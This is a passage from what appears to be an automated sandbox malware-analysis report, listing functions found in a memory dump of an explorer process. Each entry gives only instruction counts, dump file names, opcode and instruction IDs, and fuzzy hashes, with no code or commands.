                                                Function 00007FF887C698E8 Relevance: .2, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13931a9a21a471bd2ea21a8166e5334c06b49daa355ecd698ad4cf93fc9de951
                                                • Instruction ID: ef9d474894d712407f25367c43bfc4f0cd83cc853bb7f52834d80799aa440b13
                                                • Opcode Fuzzy Hash: 13931a9a21a471bd2ea21a8166e5334c06b49daa355ecd698ad4cf93fc9de951
                                                • Instruction Fuzzy Hash: AE510730A5CA064FE36D8A2CD4554BC77F2FF84790B2446BED08BC7182EF18A846C782
                                                Function 00007FF887C7138D Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d7672645794ed123af9988456a0018f8f1be78459218354c420cf90e6466b3da
                                                • Instruction ID: 21d89557e55be9902ff7a41cc06f8b2702c2618f4cfb92af4c85f399af6ca43f
                                                • Opcode Fuzzy Hash: d7672645794ed123af9988456a0018f8f1be78459218354c420cf90e6466b3da
                                                • Instruction Fuzzy Hash: 7E717F30558B068FE359CB28D1845A577F2FF94394BA0497DC48AC7A96DF39F882CB40
                                                Function 00007FF887C69BE6 Relevance: .2, Instructions: 194COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 68b0ea8c630b157457e337411dcc0f71126847d4771e0bd27b4e0a0d3718e6d0
                                                • Instruction ID: 62cf4d351e60567c4d0188caba23ebf3a798c536609324c167d207d59001c90b
                                                • Opcode Fuzzy Hash: 68b0ea8c630b157457e337411dcc0f71126847d4771e0bd27b4e0a0d3718e6d0
                                                • Instruction Fuzzy Hash: E051263194DA464FE3A59B28E4951B97BF2FF55390B0405BED04EC7183DA2DB806C792
                                                Function 00007FF887C617D5 Relevance: .2, Instructions: 172COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 36fdb3de8e97fac9955919ef6e44c646ab63308b7049ad2d08ed047b39810cf6
                                                • Instruction ID: 98f47211b0795c184a092ee55a59ffd9380baa5b1f8c4a0da109e2cd66cbeae5
                                                • Opcode Fuzzy Hash: 36fdb3de8e97fac9955919ef6e44c646ab63308b7049ad2d08ed047b39810cf6
                                                • Instruction Fuzzy Hash: 2F61FB30D1464D8FDB84EBA8D8997ECBBB1FF58340F10416AD40DE7292DB386985CB41
                                                Function 00007FF887C6F3B9 Relevance: .2, Instructions: 168COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41e83fd28f4085be5fb37a53febd5dc01b261ad688f9d988f86467d86a03ae7e
                                                • Instruction ID: f8e460cb6983d6aacafda1cd38fef396255e4e226e36e83f4c1d94cc2fbcae58
                                                • Opcode Fuzzy Hash: 41e83fd28f4085be5fb37a53febd5dc01b261ad688f9d988f86467d86a03ae7e
                                                • Instruction Fuzzy Hash: E151D570A18A1D8FDF98EF98D494AEDBBB2FF59300F50016AD00DE7295DB34A981CB40
                                                Function 00007FF887C66970 Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70ea98aa270bcf781601dc44021aebc7b525dedcb3a646b44819ae4a80bd5093
                                                • Instruction ID: 29430dd47f2e9f7c6046339d5f084e2673f568fdcec8d3b0827ab886dd475500
                                                • Opcode Fuzzy Hash: 70ea98aa270bcf781601dc44021aebc7b525dedcb3a646b44819ae4a80bd5093
                                                • Instruction Fuzzy Hash: B441E231A9CA524FE31D9A2CE4910BD7BF2FF95758B24467ED08BC3286ED18B446C641
                                                Function 00007FF887C695C5 Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: affac81e5ac93972eebbc7e6e7915fc941fc47ecbbb3a9de10dde8c0fbefa48f
                                                • Instruction ID: 7c8d97294d33643b68b549dfd71c973a55b000dd6f2b4990dfbcc188a4b1f6ca
                                                • Opcode Fuzzy Hash: affac81e5ac93972eebbc7e6e7915fc941fc47ecbbb3a9de10dde8c0fbefa48f
                                                • Instruction Fuzzy Hash: 6541B131A4CA598FD7E59B28E8859BD7BB2FF69391B1401BFE00AC3191DA18F801C791
                                                Function 00007FF887C6FA29 Relevance: .1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46c3f7eee7c908fb6732f34fb944b908123d6eb636d3842fd6fbde327095e745
                                                • Instruction ID: c02d216f1649e0d0cc5bf987eb5a47bded0593084d0e902221dae015765d152f
                                                • Opcode Fuzzy Hash: 46c3f7eee7c908fb6732f34fb944b908123d6eb636d3842fd6fbde327095e745
                                                • Instruction Fuzzy Hash: 43313532ACD2810FD3664264AC924F53BF5EF472A5B0901BFE489C7583D91EB847C3A1
                                                Function 00007FF887C6D2ED Relevance: .1, Instructions: 118COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e9cfbcc045143e0046eb7409a75db98cfd9eb93dacb1512590c09d2a6021e35
                                                • Instruction ID: 805ee17c05e892c36e2125dba9fa8ea2837e12ab0e498a1b58c68e1d05310f56
                                                • Opcode Fuzzy Hash: 0e9cfbcc045143e0046eb7409a75db98cfd9eb93dacb1512590c09d2a6021e35
                                                • Instruction Fuzzy Hash: D031086198E6865FE7565634AC945A87FB5FF832A0B0901FFD08DCB093DA092846C3A2
                                                Function 00007FF887C60A62 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f69acf1077ba335ccd20136728844651672f71aba0cfbcaee461bf3e530b6f7
                                                • Instruction ID: 512a769b5c154ac53fcfb49b3ad300d54e7b61f65da640440d3c4f6122aefb9e
                                                • Opcode Fuzzy Hash: 0f69acf1077ba335ccd20136728844651672f71aba0cfbcaee461bf3e530b6f7
                                                • Instruction Fuzzy Hash: C93184B1D5490A9FEF94EB98E4956FDBBF2FF44790B440079D009E3696DE283842C741
                                                Function 00007FF887C66491 Relevance: .1, Instructions: 97COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b2e90fe24242a937890d95d92c14f2c295ce6b067311da6ea9eda96c5e47ce36
                                                • Instruction ID: ada54fd0b7f5538a6ad412b6e0e3a02845fff9d5f4196217a36a506561a354a1
                                                • Opcode Fuzzy Hash: b2e90fe24242a937890d95d92c14f2c295ce6b067311da6ea9eda96c5e47ce36
                                                • Instruction Fuzzy Hash: 7531BF31C89A5D9FEB45EB64E8516FDB7B2FF46300F11017AE00EE7192CA396A52C781
                                                Function 00007FF887C6D431 Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c836f4ebb51487e674ad49dddd9953c3af27b8696f0f36f94760295fec88214a
                                                • Instruction ID: ced1987cae27b7f16ee223cf6c3bb5e76f1932bb2553db0125acc862a2e0309a
                                                • Opcode Fuzzy Hash: c836f4ebb51487e674ad49dddd9953c3af27b8696f0f36f94760295fec88214a
                                                • Instruction Fuzzy Hash: C421D471E9C9199FEB649758E8899FD77F6FF49390B1401BAE00ED3181CE187C018791
                                                Function 00007FF887C658AB Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 519cf7360a50890a63a45732f841e891bda84018b6fa020052f3330ddbadf565
                                                • Instruction ID: b6c7e13f28e89a482fcaaddd797ef54e0972b607bdf21ffcfdc1845372aa04bf
                                                • Opcode Fuzzy Hash: 519cf7360a50890a63a45732f841e891bda84018b6fa020052f3330ddbadf565
                                                • Instruction Fuzzy Hash: F821B17094965D8FEB94EFA8E8546ED77B2FF99350F00047AE00ED7292DB39A901CB41
                                                Function 00007FF887C69621 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dcad404d4dec39fd56ac13bdb9cab7d5c3d9f94dfc9b9768b48298ce7ac9d45
                                                • Instruction ID: ff3e60e6f4ec2b2a69deeab832da05f0f58657280d15597f7bb70476a0077559
                                                • Opcode Fuzzy Hash: 6dcad404d4dec39fd56ac13bdb9cab7d5c3d9f94dfc9b9768b48298ce7ac9d45
                                                • Instruction Fuzzy Hash: C021CF3198C7199FE7E59758E8899BD7BB2FF69290B04017EE00ED3181DE18B801C381
                                                Function 00007FF887C60598 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0e352254fb7e5a013788e2f18f7e819d05267b67cb29aa531dc81cd6f2bbe91
                                                • Instruction ID: 64f133e36aab6f599190e33d39ec1c9b9943c6025e6e30876dbdf8a4e39bee53
                                                • Opcode Fuzzy Hash: e0e352254fb7e5a013788e2f18f7e819d05267b67cb29aa531dc81cd6f2bbe91
                                                • Instruction Fuzzy Hash: 1121D370D0861E8FDB58DFA8D8846EEB7B2FB48350F10053EE419E3291DB38A950CB90
                                                Function 00007FF887C62F6A Relevance: .1, Instructions: 77COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88a4087068e5924e375bf46c2c0a7c0e701a1df871e5d94e951bf1523b286e3a
                                                • Instruction ID: b77f7f1d8f4d7a42144121d70f8daf6258f70797d12ff7c9261fbeb84eed11b8
                                                • Opcode Fuzzy Hash: 88a4087068e5924e375bf46c2c0a7c0e701a1df871e5d94e951bf1523b286e3a
                                                • Instruction Fuzzy Hash: 6921A234A4891D9FDF84EB98D495AACBBF2FF69340F511569E00EE7252CB24E881CB40
                                                Function 00007FF887C684D1 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8ae784b6be06fa086f051cb4b9cec8da25b430e14456dedf969f15a5855aca99
                                                • Instruction ID: 1ad87890adb3a23157dcbd663bf18b1e47ce02863d52ea0a20d9132cced410c7
                                                • Opcode Fuzzy Hash: 8ae784b6be06fa086f051cb4b9cec8da25b430e14456dedf969f15a5855aca99
                                                • Instruction Fuzzy Hash: 35212570D4980A9EDB98DB59E8E16FCB3B6FF59740F409078D01EA3282DE34B941CB10
                                                Function 00007FF887C6D33F Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e31897b7285085d21d65cc75e1ece60b04f5beeb243e40c52e4829800115624b
                                                • Instruction ID: fd938e37500179e031235be01505df98ceaa5f544c27a8f822e9df773f335336
                                                • Opcode Fuzzy Hash: e31897b7285085d21d65cc75e1ece60b04f5beeb243e40c52e4829800115624b
                                                • Instruction Fuzzy Hash: 2721A56199E6825FD767423498945B8BFB2BF432A170942FFD08DCB093DA4C6846C3A2
                                                Function 00007FF887C6847A Relevance: .1, Instructions: 66COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a52bb0456875933d3d2b66a9afa76adce377fd13c00e9e9036ea4d3db9affe99
                                                • Instruction ID: 5d924481d0d673f5010abfcd7b12383d22b94b17dd2a59c6e978feb6c4f9ffbe
                                                • Opcode Fuzzy Hash: a52bb0456875933d3d2b66a9afa76adce377fd13c00e9e9036ea4d3db9affe99
                                                • Instruction Fuzzy Hash: 7A111470D8940A9EDB58DB59E4E46FCB3B6FF59340F005078D01EA3282DA38B845DF14
                                                Function 00007FF887C6310B Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf7a6c3204bc82e5feaffc83d8f032d972958a3f5e05bcc5de8a6bdda417eb2a
                                                • Instruction ID: ac71c2fbab1c3b446d26aac8b620df02a10201dc109321c79cbd3e2104b05e09
                                                • Opcode Fuzzy Hash: bf7a6c3204bc82e5feaffc83d8f032d972958a3f5e05bcc5de8a6bdda417eb2a
                                                • Instruction Fuzzy Hash: 90112771A1895D9FDF80EB98D859AEDB7F1FF58300F04047AE409E3291DB34A850CB81
                                                Function 00007FF887C68F98 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31c080e3f3ce028bafe7c296f80d3ec05937493db8014a31c8be223a5862ce62
                                                • Instruction ID: 8dcb893b8fcac0665dc2683fbe15e89a63d5d09ae542aa488f11ed3cf5d18d19
                                                • Opcode Fuzzy Hash: 31c080e3f3ce028bafe7c296f80d3ec05937493db8014a31c8be223a5862ce62
                                                • Instruction Fuzzy Hash: 151106B195CA0A9FEB84A668D0855EC77F2FF98340B10413ED40ED3186EE252841CB82
                                                Function 00007FF887C63110 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0a62173cc6b811b3a9c7af9e4319e38f0ed5b7653ab18a8996fd9985d7cc1abf
                                                • Instruction ID: a5245a66c7591edd6a3035aedf47a59c2c8511cecbc9033d354612f7a2ebf3dc
                                                • Opcode Fuzzy Hash: 0a62173cc6b811b3a9c7af9e4319e38f0ed5b7653ab18a8996fd9985d7cc1abf
                                                • Instruction Fuzzy Hash: 9A110570A1891D9FDF80EB98D859AEEB7F1FF58301F00057AE409E3251CB34A850CB91
                                                Function 00007FF887C69345 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0a653a125cbe9feaccea5e1488438fc9545521725feffd3aba305afa987bb1a
                                                • Instruction ID: 43af0ea1293e2eebafd3e75807ad1b5413654e1405f9a65c0b7317470b22a77e
                                                • Opcode Fuzzy Hash: d0a653a125cbe9feaccea5e1488438fc9545521725feffd3aba305afa987bb1a
                                                • Instruction Fuzzy Hash: 69017571A5C9089FDB48E768E8926AC77F1FF59324F04017DD00ED31C2DA256816C741
                                                Function 00007FF887C6D155 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e30d6a1c42f8d59e6400fdd39ebd8d5883e9444cdd94e9b1d40c50de0d485b21
                                                • Instruction ID: 1b5611c7a8a362be039a7e7beb3fc2350b79bd774d9323e1a299553ca9b2cfc8
                                                • Opcode Fuzzy Hash: e30d6a1c42f8d59e6400fdd39ebd8d5883e9444cdd94e9b1d40c50de0d485b21
                                                • Instruction Fuzzy Hash: DE017571A5C9088FDB88E768E8926ECB7F1FF59324F04017DD00ED3282DA256856C781
                                                Function 00007FF887C6BCCD Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 634ec7715c89fbbc7f3b5a0c8017698f7c3c6ec47c0e54c9d033481540215af2
                                                • Instruction ID: b16c1435d7f3416566c8a9a17a75c727ae68cfabaa46f9d9e4de54fcd0398dfc
                                                • Opcode Fuzzy Hash: 634ec7715c89fbbc7f3b5a0c8017698f7c3c6ec47c0e54c9d033481540215af2
                                                • Instruction Fuzzy Hash: CD018F71C98649AFE791AF64D4892EC7FF1FF45354F5441FAD808C7092EA286A42C741
                                                Function 00007FF887C6C1FD Relevance: .0, Instructions: 47COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb9fc1798eff58f7ccd4fcc993a840a3ee9e62ed66f4ef631d4fefa61f1f0a97
                                                • Instruction ID: b35f9f1b9f1646edd8ddf59fdce45229de5501b63cfe127471f44bc1098a9f56
                                                • Opcode Fuzzy Hash: fb9fc1798eff58f7ccd4fcc993a840a3ee9e62ed66f4ef631d4fefa61f1f0a97
                                                • Instruction Fuzzy Hash: 5A018F30C1C64E9FDB81EBA8D8852EEBBB5BF09340F4041BAE41CC3192DA382544C752
                                                Function 00007FF887C6A088 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3e415860537b91bb62189aba4d92b0b720f3301a9e41bed0b4455a4288c5f244
                                                • Instruction ID: 27ba64323dd145502bf062d1abcf4d8f4e818b9daafc84662c97b22a074cb544
                                                • Opcode Fuzzy Hash: 3e415860537b91bb62189aba4d92b0b720f3301a9e41bed0b4455a4288c5f244
                                                • Instruction Fuzzy Hash: 06014F31A58A098FD764EB38D0915AA73E2FF55381B4049BDC44FC7596EE38F846C780
                                                Function 00007FF887C6FDE8 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51a12acffeed79de586c098a3b15692108695e86c5daf9b67729a2587f376305
                                                • Instruction ID: 99399e2e6edafece5b6f123b5124e72b413bf0de3c243126e8a93a296a4f99a5
                                                • Opcode Fuzzy Hash: 51a12acffeed79de586c098a3b15692108695e86c5daf9b67729a2587f376305
                                                • Instruction Fuzzy Hash: C4016231A58A098FD7A4EB39D0805AA73F2FF54380B40497DC04EC7696DE39F845C740
                                                Function 00007FF887C6FC67 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2e6628a0d753c7dd107e43ed25fafcb09a159a942f3174d1ce09c142e4010f1
                                                • Instruction ID: 8ea0feb6c80492c0bf49121e73ed4d3001062e7897f1bf301f533eb8fb4856d7
                                                • Opcode Fuzzy Hash: e2e6628a0d753c7dd107e43ed25fafcb09a159a942f3174d1ce09c142e4010f1
                                                • Instruction Fuzzy Hash: FBF0AF32644A0A8BE3659A1CE4913D973A3EBC5360F550A7EC84AC7395CD3DF482C300
                                                Function 00007FF887C69F07 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction ID: 8b61993bd31de818ad231a9c2b96b3e80e5edca3e5050b357c2ce6e3f965b9d1
                                                • Opcode Fuzzy Hash: a2d7cf2d697dc77884c6a93860fdbaf12e868088c6b4a688a33719a64cef7a63
                                                • Instruction Fuzzy Hash: 22F0A432244A064BD315961CE4917DA73A2EBC5360F55457EC84AC7395DD3DF582C340
                                                Function 00007FF887C608CB Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abffd04298b042f71d16c7a186e2289725a5ca71d2818b75c35cd3cf79b5a11d
                                                • Instruction ID: fd3c590c8ea77bdb287347944db800436ade2cc9507125a7db579f04fd48351b
                                                • Opcode Fuzzy Hash: abffd04298b042f71d16c7a186e2289725a5ca71d2818b75c35cd3cf79b5a11d
                                                • Instruction Fuzzy Hash: 7C018FB08486488FEB44EF6CD8883A87FF0FBDA308F44456AD40CC22D5DB351599C782
                                                Function 00007FF887C690A2 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ff887c60000_explorer.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 08071710ee4b3a0a99fae776bc3be7cfb41d676a9ee10936d3940716cab33e2b
                                                • Instruction ID: df34843fc9bd58fda18ef92ac0589ebb01f09b858e8c309e3e5ccf7e603fd2f0
                                                • Opcode Fuzzy Hash: 08071710ee4b3a0a99fae776bc3be7cfb41d676a9ee10936d3940716cab33e2b
                                                • Instruction Fuzzy Hash: 6FF0A931E1890D9FDF84EBA8C495AEDB7F1FF58341B404069D40EE3251DE28A841CB51
                                                Function 00007FF887C61BE3 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.1784824065.00007FF887C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
